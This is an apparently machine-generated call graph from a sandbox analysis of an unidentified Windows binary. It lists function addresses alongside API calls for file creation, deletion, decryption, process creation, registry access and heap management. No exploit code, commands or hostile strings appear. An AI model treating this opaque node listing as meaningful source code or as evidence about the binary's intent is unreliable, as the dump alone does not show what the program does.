73 API calls 49561->49563 49562->49546 49563->49559 49568 96b3c8 49564->49568 49567->49551 49569 96b3d3 49568->49569 49570 91a2e9 49569->49570 49572 96a9ff 49569->49572 49570->49559 49583 912ec6 49572->49583 49574 96aa1c 49575 96aa22 49574->49575 49576 912ae3 56 API calls 49574->49576 49581 96aaaa 49575->49581 49598 91367f GetProcessHeap RtlFreeHeap GetLastError 49575->49598 49577 96aa4f 49576->49577 49577->49575 49578 96a805 69 API calls 49577->49578 49578->49575 49580 96aab7 49580->49570 49581->49580 49599 91367f GetProcessHeap RtlFreeHeap GetLastError 49581->49599 49584 912ee9 49583->49584 49585 912ede 49583->49585 49587 912f14 MultiByteToWideChar 49584->49587 49588 912f77 49584->49588 49590 912eef 49584->49590 49586 9137f3 2 API calls 49585->49586 49586->49584 49587->49588 49589 912f2b GetLastError 49587->49589 49588->49590 49591 912fc4 49588->49591 49592 912fcd 49588->49592 49597 912fcb 49588->49597 49589->49590 49590->49574 49600 9156c2 GetProcessHeap RtlReAllocateHeap 49591->49600 49601 91540b GetProcessHeap RtlAllocateHeap 49592->49601 49593 913018 MultiByteToWideChar 49593->49590 49596 913031 GetLastError 49593->49596 49596->49590 49597->49590 49597->49593 49598->49581 49599->49580 49600->49597 49601->49597 50694 9672cf 20 API calls __vsnwprintf_l 50695 9290c9 130 API calls _ValidateLocalCookies 50698 9194f0 76 API calls 2 library calls 50702 960ef0 15 API calls 50703 919ae0 60 API calls _ValidateLocalCookies 50704 939ce0 179 API calls 50705 940ee0 81 API calls 50707 960ce0 16 API calls _memcpy_s 50225 9174ee 50259 92a5be 50225->50259 50228 914456 60 API calls 50230 917575 50228->50230 50229 9176b8 IsWindow 50231 9176c5 PostMessageW 50229->50231 50232 9176d4 50229->50232 50238 91759f 50230->50238 50256 917546 50230->50256 50309 92e4a9 50230->50309 50231->50232 50233 9176e7 50232->50233 50234 9176da CloseHandle 50232->50234 50235 9176fb 50233->50235 50236 9176ef CloseHandle 50233->50236 50234->50233 50239 917700 CloseHandle 50235->50239 50240 91770c 
50235->50240 50236->50235 50238->50256 50316 93347d 50238->50316 50239->50240 50242 917710 CloseHandle 50240->50242 50243 917717 50240->50243 50242->50243 50362 913886 50243->50362 50244 9175e8 50244->50256 50348 912b11 50244->50348 50248 913886 5 API calls 50250 917727 50248->50250 50252 917735 50250->50252 50367 91367f GetProcessHeap RtlFreeHeap GetLastError 50250->50367 50255 917743 50252->50255 50368 91367f GetProcessHeap RtlFreeHeap GetLastError 50252->50368 50253 917659 50253->50256 50356 96bf20 50253->50356 50256->50229 50261 92a5e0 50259->50261 50369 929fd1 50261->50369 50263 92a700 50267 92a7f7 50263->50267 50268 92a660 50263->50268 50282 92a738 50263->50282 50264 912eaf 52 API calls 50265 92a634 50264->50265 50265->50263 50266 92a6a5 50265->50266 50265->50268 50415 96b350 73 API calls 50265->50415 50266->50263 50275 912eaf 52 API calls 50266->50275 50270 92a80f 50267->50270 50378 91a7ad 50267->50378 50272 92a99c 50268->50272 50421 91367f GetProcessHeap RtlFreeHeap GetLastError 50268->50421 50271 92a8c1 50270->50271 50284 92a827 50270->50284 50420 96ac92 6 API calls 50271->50420 50278 913886 5 API calls 50272->50278 50274 92a744 Sleep 50274->50282 50280 92a6cd 50275->50280 50281 917540 50278->50281 50279 96b0e2 127 API calls 50279->50282 50280->50263 50280->50268 50286 912eaf 52 API calls 50280->50286 50281->50228 50281->50256 50282->50274 50282->50279 50285 92a785 50282->50285 50283 92a896 50419 92a07c 73 API calls 50283->50419 50284->50283 50288 92a83b 50284->50288 50289 92a78c 50285->50289 50296 92a7ec 50285->50296 50286->50263 50291 914601 52 API calls 50288->50291 50416 96ac92 6 API calls 50289->50416 50290 92a847 50290->50268 50290->50296 50381 96b0e2 EnterCriticalSection 50290->50381 50291->50290 50294 92a791 50299 92a79c 50294->50299 50417 93d2ec 56 API calls 50294->50417 50295 92a92a 50297 912eaf 52 API calls 50295->50297 50306 92a955 50295->50306 50296->50268 50296->50295 50301 912eaf 52 API calls 50296->50301 50297->50306 50299->50296 50305 
92a7c3 50299->50305 50300 92a88b 50418 96ac92 6 API calls 50300->50418 50304 92a8fd 50301->50304 50307 912eaf 52 API calls 50304->50307 50305->50268 50306->50268 50308 91b89c 80 API calls 50306->50308 50307->50295 50308->50268 50310 914456 60 API calls 50309->50310 50311 92e4bd 50310->50311 50314 92e4c3 50311->50314 50535 92cc1b 50311->50535 50313 92e529 50313->50238 50314->50313 50554 91367f GetProcessHeap RtlFreeHeap GetLastError 50314->50554 50317 912acf 56 API calls 50316->50317 50318 9334a2 50317->50318 50322 9334ab 50318->50322 50616 932ad9 GetCurrentProcess GetCurrentProcess DuplicateHandle 50318->50616 50322->50244 50325 9335a3 50325->50322 50634 931c8a 52 API calls 50325->50634 50326 933539 50326->50322 50326->50325 50632 9129f3 56 API calls 50326->50632 50329 9335cf 50329->50322 50331 933623 50329->50331 50332 9335f4 50329->50332 50330 93357a 50330->50322 50633 91146c 52 API calls 50330->50633 50636 9129dc 52 API calls 50331->50636 50335 933606 50332->50335 50635 9129dc 52 API calls 50332->50635 50335->50322 50337 933660 50335->50337 50637 9129dc 52 API calls 50335->50637 50337->50322 50339 9336b6 50337->50339 50638 9129dc 52 API calls 50337->50638 50339->50322 50340 9336fd 50339->50340 50640 9129f3 56 API calls 50339->50640 50340->50322 50343 933733 50340->50343 50641 9129f3 56 API calls 50340->50641 50343->50322 50642 931d8a 56 API calls 50343->50642 50344 933690 50344->50322 50639 91146c 52 API calls 50344->50639 50646 912afa 50348->50646 50351 9337dc 50352 9337f5 _memcpy_s 50351->50352 50353 933844 CreateProcessW 50352->50353 50354 93384a GetLastError 50353->50354 50355 933856 50353->50355 50354->50355 50355->50253 50357 91174a 2 API calls 50356->50357 50358 96bf2f 50357->50358 50359 96bf66 GetExitCodeProcess 50358->50359 50361 96bf42 50358->50361 50360 96bf76 GetLastError 50359->50360 50359->50361 50360->50361 50361->50256 50649 9138a9 50362->50649 50364 913892 50365 9138a2 50364->50365 50653 91367f GetProcessHeap RtlFreeHeap GetLastError 
50364->50653 50365->50248 50367->50252 50368->50255 50370 96cba8 RegOpenKeyExW 50369->50370 50371 929ff7 50370->50371 50377 92a00c 50371->50377 50422 96cd94 58 API calls 50371->50422 50373 92a069 50375 92a078 50373->50375 50376 92a06f RegCloseKey 50373->50376 50375->50264 50375->50265 50376->50375 50377->50373 50423 91367f GetProcessHeap RtlFreeHeap GetLastError 50377->50423 50424 9183d7 EnterCriticalSection 50378->50424 50380 91a7c5 50380->50270 50382 96b104 50381->50382 50383 96b13d 50381->50383 50382->50383 50384 96b109 50382->50384 50385 913db5 52 API calls 50383->50385 50478 913ec2 50384->50478 50390 96b14c 50385->50390 50387 96b122 50388 96b295 50387->50388 50389 96b29a 50387->50389 50391 96b12c 50387->50391 50526 96af11 90 API calls _ValidateLocalCookies 50388->50526 50393 96b2b8 50389->50393 50395 96b3f2 10 API calls 50389->50395 50390->50391 50397 96b17e 50390->50397 50512 91417b 60 API calls 50390->50512 50394 96b2f4 LeaveCriticalSection 50391->50394 50393->50394 50398 912eaf 52 API calls 50393->50398 50400 96b305 50394->50400 50401 96b30d 50394->50401 50402 96b2a9 50395->50402 50397->50391 50399 914601 52 API calls 50397->50399 50398->50391 50403 96b1b1 50399->50403 50528 91367f GetProcessHeap RtlFreeHeap GetLastError 50400->50528 50405 92a885 50401->50405 50529 91367f GetProcessHeap RtlFreeHeap GetLastError 50401->50529 50402->50393 50527 91367f GetProcessHeap RtlFreeHeap GetLastError 50402->50527 50403->50391 50513 916305 CreateDirectoryW 50403->50513 50405->50296 50405->50300 50409 96b1d4 50409->50391 50410 96b1fe CreateFileW 50409->50410 50411 96b234 GetLastError 50410->50411 50412 96b240 50410->50412 50411->50412 50412->50387 50413 96b27f SetFilePointer 50412->50413 50414 96b24d 50412->50414 50413->50387 50414->50391 50415->50266 50416->50294 50417->50299 50418->50299 50419->50290 50420->50296 50421->50272 50422->50377 50423->50373 50425 918417 50424->50425 50426 9129c8 52 API calls 50425->50426 50462 918420 50425->50462 50457 918452 50426->50457 
50427 918a0e LeaveCriticalSection 50428 918a57 50427->50428 50438 918a1e 50427->50438 50433 918a88 50428->50433 50434 918a6a 50428->50434 50429 918682 50471 91b957 52 API calls 50429->50471 50430 918a4b 50432 9155c9 3 API calls 50430->50432 50432->50428 50435 913886 5 API calls 50433->50435 50436 918a78 50434->50436 50476 91367f GetProcessHeap RtlFreeHeap GetLastError 50434->50476 50441 918a90 50435->50441 50439 918a86 50436->50439 50477 91367f GetProcessHeap RtlFreeHeap GetLastError 50436->50477 50438->50430 50440 913886 5 API calls 50438->50440 50475 91367f GetProcessHeap RtlFreeHeap GetLastError 50438->50475 50439->50380 50440->50438 50447 913886 5 API calls 50441->50447 50442 9186a5 50442->50380 50443 9187a4 50472 91b957 52 API calls 50443->50472 50448 918a98 50447->50448 50450 913886 5 API calls 50448->50450 50449 91b957 52 API calls 50449->50457 50450->50439 50451 91b99a 52 API calls 50451->50457 50456 918698 50456->50442 50456->50462 50473 91b938 52 API calls 50456->50473 50457->50429 50457->50443 50457->50449 50457->50451 50460 912eaf 52 API calls 50457->50460 50457->50462 50465 9156c2 GetProcessHeap RtlReAllocateHeap 50457->50465 50466 91540b GetProcessHeap RtlAllocateHeap 50457->50466 50467 91b4f2 CompareStringW GetLastError EnterCriticalSection LeaveCriticalSection 50457->50467 50468 918b6f 64 API calls 50457->50468 50469 913089 52 API calls 50457->50469 50470 91b979 56 API calls 50457->50470 50460->50457 50462->50427 50464 918963 50474 91b99a 52 API calls 50464->50474 50465->50457 50466->50457 50467->50457 50468->50457 50469->50457 50470->50457 50471->50456 50472->50456 50473->50464 50474->50462 50475->50438 50476->50436 50477->50439 50479 913f14 50478->50479 50480 913f4d 50478->50480 50479->50480 50482 913f19 50479->50482 50481 914dd8 70 API calls 50480->50481 50483 913f57 50481->50483 50484 913dce 52 API calls 50482->50484 50486 913dce 52 API calls 50483->50486 50497 913f2c 50483->50497 50485 913f26 50484->50485 50487 914601 52 API calls 50485->50487 
50485->50497 50486->50485 50488 913fa2 50487->50488 50490 916305 5 API calls 50488->50490 50494 913faf 50488->50494 50489 91413e 50493 91414c 50489->50493 50531 91367f GetProcessHeap RtlFreeHeap GetLastError 50489->50531 50490->50494 50491 913feb GetLocalTime 50491->50494 50496 91415a 50493->50496 50532 91367f GetProcessHeap RtlFreeHeap GetLastError 50493->50532 50494->50491 50494->50497 50498 912acf 56 API calls 50494->50498 50504 91404f CreateFileW 50494->50504 50505 9140ba 50494->50505 50507 9140e3 50494->50507 50508 914083 Sleep 50494->50508 50500 914168 50496->50500 50533 91367f GetProcessHeap RtlFreeHeap GetLastError 50496->50533 50497->50489 50530 91367f GetProcessHeap RtlFreeHeap GetLastError 50497->50530 50498->50494 50501 9567e6 _ValidateLocalCookies 5 API calls 50500->50501 50503 914177 50501->50503 50503->50387 50504->50505 50506 914071 GetLastError 50504->50506 50505->50507 50509 912eaf 52 API calls 50505->50509 50506->50494 50506->50508 50507->50497 50511 914129 CloseHandle 50507->50511 50508->50494 50510 914093 50508->50510 50509->50507 50510->50494 50511->50497 50512->50397 50514 916321 GetLastError 50513->50514 50522 91632e 50513->50522 50515 916335 50514->50515 50514->50522 50516 91633a 50515->50516 50519 916346 50515->50519 50534 916414 GetFileAttributesW 50516->50534 50518 916342 50518->50519 50518->50522 50520 916305 GetFileAttributesW 50519->50520 50519->50522 50521 916385 50520->50521 50521->50522 50523 9163ad CreateDirectoryW 50521->50523 50522->50409 50524 9163bb GetLastError 50523->50524 50525 9163cb 50523->50525 50524->50525 50525->50522 50526->50389 50527->50393 50528->50401 50529->50405 50530->50489 50531->50493 50532->50496 50533->50500 50534->50518 50555 92ed3b 50535->50555 50538 972127 73 API calls 50539 92cc66 50538->50539 50540 916305 5 API calls 50539->50540 50553 92cc40 50539->50553 50541 92cc8c 50540->50541 50546 972127 73 API calls 50541->50546 50541->50553 50543 92cd60 50545 92cd6d 50543->50545 50597 91367f GetProcessHeap 
RtlFreeHeap GetLastError 50543->50597 50544 92cd53 50544->50543 50596 91367f GetProcessHeap RtlFreeHeap GetLastError 50544->50596 50545->50314 50549 92ccb8 50546->50549 50549->50553 50567 92cd75 CreateFileW 50549->50567 50552 912eaf 52 API calls 50552->50553 50553->50544 50595 91367f GetProcessHeap RtlFreeHeap GetLastError 50553->50595 50554->50313 50556 92ede9 DecryptFileW 50555->50556 50565 92ed56 50555->50565 50557 92edb7 50556->50557 50558 92edfd 50556->50558 50559 92cc3a 50557->50559 50599 91367f GetProcessHeap RtlFreeHeap GetLastError 50557->50599 50561 912eaf 52 API calls 50558->50561 50559->50538 50559->50553 50560 972127 73 API calls 50560->50565 50561->50557 50564 916305 5 API calls 50564->50565 50565->50560 50565->50564 50566 92eda1 50565->50566 50598 96acf6 72 API calls _ValidateLocalCookies 50565->50598 50566->50556 50566->50557 50568 92ce17 50567->50568 50569 92cdc8 GetLastError 50567->50569 50600 9739dd SetFilePointerEx 50568->50600 50575 92cdd4 50569->50575 50571 92ce21 50572 92ce27 50571->50572 50603 972b2e 50571->50603 50576 92d04d CloseHandle 50572->50576 50578 9567e6 _ValidateLocalCookies 5 API calls 50575->50578 50576->50575 50577 92ce9a SetFilePointerEx 50579 92cef2 50577->50579 50580 92ceab GetLastError 50577->50580 50581 92cce3 50578->50581 50611 973f70 50579->50611 50580->50572 50581->50552 50581->50553 50583 92cefe 50583->50572 50584 92cf1b SetFilePointerEx 50583->50584 50585 92cf74 50584->50585 50586 92cf2e GetLastError 50584->50586 50587 973f70 2 API calls 50585->50587 50586->50572 50588 92cf80 50587->50588 50588->50572 50589 973f70 2 API calls 50588->50589 50590 92cfa9 50589->50590 50590->50572 50591 92cfc3 SetFilePointerEx 50590->50591 50592 92cfd6 GetLastError 50591->50592 50593 92cfe2 50591->50593 50592->50593 50594 973f70 2 API calls 50593->50594 50594->50572 50595->50544 50596->50543 50597->50545 50598->50565 50599->50559 50601 9739ff GetLastError 50600->50601 50602 973a0b 50600->50602 50601->50602 50602->50571 50607 972b3b 
___scrt_uninitialize_crt 50603->50607 50604 972ba7 ReadFile 50605 972c39 GetLastError 50604->50605 50604->50607 50610 972c12 50605->50610 50606 973f70 2 API calls 50606->50607 50607->50604 50607->50606 50607->50610 50608 9567e6 _ValidateLocalCookies 5 API calls 50609 92ce5f 50608->50609 50609->50572 50609->50576 50609->50577 50610->50608 50612 973f85 WriteFile 50611->50612 50615 973fc0 50611->50615 50613 973f9f GetLastError 50612->50613 50614 973fab 50612->50614 50613->50614 50614->50612 50614->50615 50615->50583 50617 932b0e GetLastError 50616->50617 50618 932b5c 50616->50618 50620 932b1a 50617->50620 50643 912a55 56 API calls 50618->50643 50621 932bb5 50620->50621 50622 932bae CloseHandle 50620->50622 50621->50322 50623 932bbd CreateFileW 50621->50623 50622->50621 50624 932c02 50623->50624 50625 932c86 50623->50625 50644 912a55 56 API calls 50624->50644 50625->50322 50631 932c8f 56 API calls 50625->50631 50627 932c15 50629 932c1e 50627->50629 50645 9129f3 56 API calls 50627->50645 50629->50625 50630 932c7f CloseHandle 50629->50630 50630->50625 50631->50326 50632->50330 50633->50325 50634->50329 50635->50335 50636->50335 50637->50337 50638->50344 50639->50339 50640->50340 50641->50343 50642->50322 50643->50620 50644->50627 50645->50629 50647 911ae9 56 API calls 50646->50647 50648 912b0d 50647->50648 50648->50256 50648->50351 50650 9138bb 50649->50650 50652 9138c5 50649->50652 50654 91593a GetProcessHeap HeapSize 50650->50654 50652->50364 50653->50365 50654->50652 50708 918e10 6 API calls 50709 93d010 19 API calls 50710 94e210 55 API calls 50711 961e10 GetCommandLineA GetCommandLineW 50713 919000 72 API calls 48486 956a07 48495 957100 GetModuleHandleW 48486->48495 48488 956a0f 48489 956a45 48488->48489 48491 956a13 48488->48491 48497 95e73d 21 API calls CallUnexpected 48489->48497 48490 956a1e 48491->48490 48496 95e71f 21 API calls CallUnexpected 48491->48496 48494 956a4d 48495->48488 48496->48490 48497->48494 50714 956800 49 API calls __RTC_Initialize 50715 963000 
GetProcessHeap 50717 92940e 84 API calls 50718 919430 9 API calls 49628 93de30 49629 93de52 49628->49629 49633 93de5c 49628->49633 49630 93de57 49629->49630 49631 93de6c 49629->49631 49632 93de61 49630->49632 49630->49633 49637 93e386 SetEvent 49631->49637 49668 93e2b8 DosDateTimeToFileTime LocalFileTimeToFileTime SetFileTime CloseHandle 49632->49668 49636 93de6a 49636->49633 49638 93e3e5 49637->49638 49639 93e39f GetLastError 49637->49639 49640 91174a 2 API calls 49638->49640 49645 93e3ab 49639->49645 49641 93e3ef 49640->49641 49642 93e419 ResetEvent 49641->49642 49641->49645 49643 93e426 GetLastError 49642->49643 49644 93e46c 49642->49644 49643->49645 49644->49645 49646 912ec6 10 API calls 49644->49646 49645->49633 49647 93e4c7 49646->49647 49647->49645 49648 93e4f4 SetEvent 49647->49648 49649 93e501 GetLastError 49648->49649 49650 93e547 49648->49650 49649->49645 49651 91174a 2 API calls 49650->49651 49652 93e551 49651->49652 49652->49645 49653 93e573 ResetEvent 49652->49653 49654 93e580 GetLastError 49653->49654 49655 93e5c6 49653->49655 49654->49645 49656 93e5d3 49655->49656 49657 93e66d CreateFileW 49655->49657 49656->49645 49669 91540b GetProcessHeap RtlAllocateHeap 49656->49669 49658 93e692 GetLastError 49657->49658 49659 93e6dc SetFilePointerEx 49657->49659 49666 93e69e 49658->49666 49660 93e6f0 GetLastError 49659->49660 49661 93e736 SetEndOfFile 49659->49661 49667 93e6fc 49660->49667 49663 93e743 GetLastError 49661->49663 49664 93e786 SetFilePointerEx 49661->49664 49663->49667 49664->49645 49665 93e797 GetLastError 49664->49665 49665->49667 49666->49659 49667->49645 49668->49636 49669->49645 49734 97c43d 49735 97c41c 49734->49735 49736 97c6ef ___delayLoadHelper2@8 16 API calls 49735->49736 49736->49735 50719 929839 96 API calls _ValidateLocalCookies 50720 92e622 64 API calls 50721 919c20 79 API calls 2 library calls 50218 93de20 50219 9155c9 3 API calls 50218->50219 50220 93de2b 50219->50220 50723 916a25 90 API calls 50724 922c2a LoadLibraryExW 
GetLastError GetProcAddress GetLastError 50729 956a50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 50730 93fa55 77 API calls 50732 95de5b 42 API calls 2 library calls 50734 916c2a 8 API calls 49670 917e72 49672 917e78 49670->49672 49671 917ee0 49674 917ef2 49671->49674 49713 92a9ad 131 API calls 49671->49713 49672->49671 49712 91367f GetProcessHeap RtlFreeHeap GetLastError 49672->49712 49675 9256b4 94 API calls 49674->49675 49677 917efe 49675->49677 49678 92fbe8 94 API calls 49677->49678 49679 917f0a 49678->49679 49680 92fdf6 3 API calls 49679->49680 49681 917f16 49680->49681 49682 917f42 49681->49682 49683 918119 72 API calls 49681->49683 49684 918119 72 API calls 49682->49684 49683->49682 49685 917f80 49684->49685 49686 96ae56 4 API calls 49685->49686 49687 917fc4 49686->49687 49688 92c13d 54 API calls 49687->49688 49689 917ff0 49688->49689 49690 93d6fd 2 API calls 49689->49690 49691 91803c 49690->49691 49692 936157 2 API calls 49691->49692 49693 918050 49692->49693 49694 91774c 19 API calls 49693->49694 49695 9180b3 49694->49695 49696 9180c1 49695->49696 49714 970d9c CoUninitialize 49695->49714 49698 9180cf 49696->49698 49715 96fbc7 FreeLibrary 49696->49715 49700 9180dd 49698->49700 49716 96d520 FreeLibrary 49698->49716 49702 9180f0 49700->49702 49717 9710aa FreeLibrary FreeLibrary 49700->49717 49704 9180f4 CoUninitialize 49702->49704 49705 9180fa 49702->49705 49704->49705 49708 96b41c 78 API calls 49705->49708 49706 9180eb 49718 96a6e3 FreeLibrary FreeLibrary 49706->49718 49709 918106 49708->49709 49710 9567e6 _ValidateLocalCookies 5 API calls 49709->49710 49711 918115 49710->49711 49712->49671 49713->49674 49714->49696 49715->49698 49716->49700 49717->49706 49718->49702 50738 962070 7 API calls 50739 960670 75 API calls 2 library calls 50740 967e70 IsProcessorFeaturePresent 50743 918e60 87 API calls 50745 953604 119 API calls 50747 935e6e 95 API calls 48372 917d90 298 API calls 
_ValidateLocalCookies 50753 916999 EnterCriticalSection LeaveCriticalSection 48479 97c19c 48480 97c17b 48479->48480 48480->48479 48481 97c6ef ___delayLoadHelper2@8 16 API calls 48480->48481 48481->48480 50755 925180 5 API calls _ValidateLocalCookies 48513 917b87 48514 917b90 48513->48514 48515 917ba6 48513->48515 48702 93d137 15 API calls 48514->48702 48518 917bb1 CoInitializeEx 48515->48518 48517 917ba4 48517->48515 48519 917b31 48518->48519 48520 917ee0 48519->48520 48703 91367f GetProcessHeap RtlFreeHeap GetLastError 48519->48703 48522 917ef2 48520->48522 48704 92a9ad 131 API calls 48520->48704 48560 9256b4 48522->48560 48529 917f16 48530 917f42 48529->48530 48531 918119 72 API calls 48529->48531 48584 918119 48530->48584 48531->48530 48535 917fc4 48592 92c13d 48535->48592 48541 918050 48612 91774c 48541->48612 48543 9180b3 48544 9180c1 48543->48544 48705 970d9c CoUninitialize 48543->48705 48546 9180cf 48544->48546 48706 96fbc7 FreeLibrary 48544->48706 48548 9180dd 48546->48548 48707 96d520 FreeLibrary 48546->48707 48550 9180f0 48548->48550 48708 9710aa FreeLibrary FreeLibrary 48548->48708 48552 9180f4 CoUninitialize 48550->48552 48553 9180fa 48550->48553 48552->48553 48691 96b41c 48553->48691 48554 9180eb 48709 96a6e3 FreeLibrary FreeLibrary 48554->48709 48559 918115 48561 9256c1 48560->48561 48562 917efe 48560->48562 48717 915c81 48561->48717 48564 92fbe8 48562->48564 48565 917f0a 48564->48565 48566 92fbf8 48564->48566 48568 92fdf6 48565->48568 48567 915c81 94 API calls 48566->48567 48567->48565 48569 92fe03 48568->48569 48570 92fe0e 48568->48570 48896 913605 GetProcessHeap RtlFreeHeap GetLastError 48569->48896 48572 92fe1c 48570->48572 48897 91367f GetProcessHeap RtlFreeHeap GetLastError 48570->48897 48573 92fe2a 48572->48573 48898 91367f GetProcessHeap RtlFreeHeap GetLastError 48572->48898 48576 92fe38 48573->48576 48899 91367f GetProcessHeap RtlFreeHeap GetLastError 48573->48899 48579 92fe48 48576->48579 48900 91367f GetProcessHeap RtlFreeHeap GetLastError 
48576->48900 48580 92fe58 48579->48580 48901 91367f GetProcessHeap RtlFreeHeap GetLastError 48579->48901 48582 92fe68 _memcpy_s 48580->48582 48902 91367f GetProcessHeap RtlFreeHeap GetLastError 48580->48902 48582->48529 48903 96b07f 48584->48903 48587 96ae56 EnterCriticalSection 48588 96ae71 FlushFileBuffers 48587->48588 48591 96ae6e 48587->48591 48589 96aec4 LeaveCriticalSection 48588->48589 48590 96ae7c GetLastError 48588->48590 48589->48535 48590->48591 48591->48589 48966 96a051 48592->48966 48594 92c15b 48595 96a051 6 API calls 48594->48595 48604 92c161 48594->48604 48596 92c195 48595->48596 48597 92c1ce 48596->48597 48596->48604 48969 92b637 48 API calls 48596->48969 48597->48604 48970 92b637 48 API calls 48597->48970 48599 917ff0 48605 93d6fd IsWindow 48599->48605 48602 92c1f7 48602->48604 48971 91174a WaitForSingleObject 48602->48971 48604->48599 48975 9155c9 GetProcessHeap RtlFreeHeap 48604->48975 48606 91803c 48605->48606 48607 93d714 PostMessageW 48605->48607 48608 936157 48606->48608 48607->48606 48609 936163 48608->48609 48611 936170 48608->48611 48610 91174a 2 API calls 48609->48610 48610->48611 48611->48541 48613 917764 48612->48613 48614 91775e 48612->48614 48616 917774 48613->48616 48617 9155c9 3 API calls 48613->48617 49158 969966 LocalFree 48614->49158 48618 917784 48616->48618 48619 9155c9 3 API calls 48616->48619 48617->48616 48620 917791 CloseHandle 48618->48620 48621 91779e 48618->48621 48619->48618 48620->48621 48622 9177b5 DeleteCriticalSection 48621->48622 48623 9177a8 CloseHandle 48621->48623 48624 9177db 48622->48624 48625 9177ce CloseHandle 48622->48625 48623->48622 48626 9177f2 48624->48626 48627 9177e5 CloseHandle 48624->48627 48625->48624 48989 92b9e9 48626->48989 48627->48626 48629 9177fe 48630 92b9e9 7 API calls 48629->48630 48631 91780a 48630->48631 48632 91781a 48631->48632 49159 91367f GetProcessHeap RtlFreeHeap GetLastError 48631->49159 48634 917831 48632->48634 48635 917824 CloseHandle 48632->48635 49002 92058b 48634->49002 
48635->48634 48639 917856 49014 91e956 48639->49014 48645 91787a 49029 91c06f DeleteCriticalSection 48645->49029 48651 91789e 49120 92003c 48651->49120 48657 9178bf 49150 91f3f2 48657->49150 48660 9178d8 48662 9178e5 48660->48662 49161 91367f GetProcessHeap RtlFreeHeap GetLastError 48660->49161 48664 9178f2 48662->48664 49162 91367f GetProcessHeap RtlFreeHeap GetLastError 48662->49162 48666 9178ff 48664->48666 49163 91367f GetProcessHeap RtlFreeHeap GetLastError 48664->49163 48669 91790f 48666->48669 49164 91367f GetProcessHeap RtlFreeHeap GetLastError 48666->49164 48670 91791f 48669->48670 49165 91367f GetProcessHeap RtlFreeHeap GetLastError 48669->49165 48672 91792f 48670->48672 49166 91367f GetProcessHeap RtlFreeHeap GetLastError 48670->49166 48674 91793f 48672->48674 49167 91367f GetProcessHeap RtlFreeHeap GetLastError 48672->49167 48676 91794f 48674->48676 49168 91367f GetProcessHeap RtlFreeHeap GetLastError 48674->49168 48678 91795f 48676->48678 49169 91367f GetProcessHeap RtlFreeHeap GetLastError 48676->49169 48680 91796f 48678->48680 49170 91367f GetProcessHeap RtlFreeHeap GetLastError 48678->49170 48682 91797f 48680->48682 49171 91367f GetProcessHeap RtlFreeHeap GetLastError 48680->49171 48684 91798f 48682->48684 49172 91367f GetProcessHeap RtlFreeHeap GetLastError 48682->49172 48686 91799f 48684->48686 49173 91367f GetProcessHeap RtlFreeHeap GetLastError 48684->49173 48688 9179af DeleteCriticalSection 48686->48688 49174 91367f GetProcessHeap RtlFreeHeap GetLastError 48686->49174 48689 9179c8 _memcpy_s 48688->48689 48689->48543 49304 96ac32 48691->49304 48694 96b432 DeleteCriticalSection 48695 96b443 48694->48695 48696 96b45e 48695->48696 49314 91367f GetProcessHeap RtlFreeHeap GetLastError 48695->49314 48698 96b473 48696->48698 49315 91367f GetProcessHeap RtlFreeHeap GetLastError 48696->49315 48700 918106 48698->48700 49316 91367f GetProcessHeap RtlFreeHeap GetLastError 48698->49316 48710 9567e6 48700->48710 48702->48517 48703->48520 48704->48522 
48705->48544 48706->48546 48707->48548 48708->48554 48709->48550 48711 9567ef IsProcessorFeaturePresent 48710->48711 48712 9567ee 48710->48712 48714 956b55 48711->48714 48712->48559 49320 956b18 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48714->49320 48716 956c38 48716->48559 48718 915cbb _memcpy_s 48717->48718 48719 915cd9 GetFileAttributesW 48718->48719 48720 915d61 48719->48720 48721 915cf4 GetLastError 48719->48721 48722 915dda 48720->48722 48723 915d6d SetFileAttributesW 48720->48723 48749 9160d8 48720->48749 48733 915d00 48721->48733 48725 91615c RemoveDirectoryW 48722->48725 48726 915e01 48722->48726 48771 914dd8 48722->48771 48723->48722 48724 915d7d GetLastError 48723->48724 48734 915d89 48724->48734 48728 91616d GetLastError 48725->48728 48725->48749 48726->48733 48763 913db5 48726->48763 48730 916179 48728->48730 48739 916190 MoveFileExW 48730->48739 48730->48749 48732 9162af FindClose 48732->48733 48736 9162ca 48733->48736 48786 91367f GetProcessHeap RtlFreeHeap GetLastError 48733->48786 48734->48733 48738 9162de 48736->48738 48787 91367f GetProcessHeap RtlFreeHeap GetLastError 48736->48787 48742 9162f2 48738->48742 48788 91367f GetProcessHeap RtlFreeHeap GetLastError 48738->48788 48739->48749 48740 915e78 GetLastError 48762 915e84 48740->48762 48744 9567e6 _ValidateLocalCookies 5 API calls 48742->48744 48746 916301 48744->48746 48745 9160b7 FindNextFileW 48747 91614d GetLastError 48745->48747 48745->48762 48746->48562 48747->48725 48748 9161fd GetLastError 48747->48748 48748->48749 48749->48732 48749->48733 48750 913db5 52 API calls 48750->48762 48752 91600b DeleteFileW 48752->48762 48753 915fba SetFileAttributesW 48753->48752 48754 915fcf GetLastError 48753->48754 48760 915fdb 48754->48760 48755 91607a GetLastError 48755->48762 48757 915c81 75 API calls 48757->48762 48758 916048 MoveFileExW 48758->48760 48759 9160f2 48759->48749 48760->48758 48760->48759 48761 91606a MoveFileExW 48760->48761 48760->48762 
48785 914b8a 61 API calls 48760->48785 48761->48762 48762->48745 48762->48749 48762->48750 48762->48752 48762->48753 48762->48755 48762->48757 48762->48760 48766 913cfd 48762->48766 48789 913dce 48763->48789 48765 913dca FindFirstFileW 48765->48740 48765->48762 48767 9137f3 2 API calls 48766->48767 48769 913d1a 48767->48769 48768 913d20 48768->48762 48769->48768 48831 9129dc 52 API calls 48769->48831 48772 914df2 48771->48772 48773 914e46 48771->48773 48775 9137f3 2 API calls 48772->48775 48840 9129c8 48773->48840 48776 914dfc 48775->48776 48780 914e02 48776->48780 48832 911839 48776->48832 48778 914e2f 48779 914e6c GetProcAddress 48778->48779 48778->48780 48781 914e83 48779->48781 48780->48726 48782 914f0c GetLastError 48781->48782 48783 9129c8 52 API calls 48781->48783 48784 914ec7 48781->48784 48782->48784 48783->48781 48784->48780 48785->48760 48786->48736 48787->48738 48788->48742 48790 913e8a 48789->48790 48791 913dde 48789->48791 48792 912eaf 52 API calls 48790->48792 48791->48790 48793 913de9 48791->48793 48796 913e11 48792->48796 48794 913e67 48793->48794 48797 913dff 48793->48797 48795 912eaf 52 API calls 48794->48795 48795->48796 48796->48765 48803 912eaf 48797->48803 48800 913cfd 52 API calls 48801 913e2d 48800->48801 48801->48796 48806 9129dc 52 API calls 48801->48806 48807 911d40 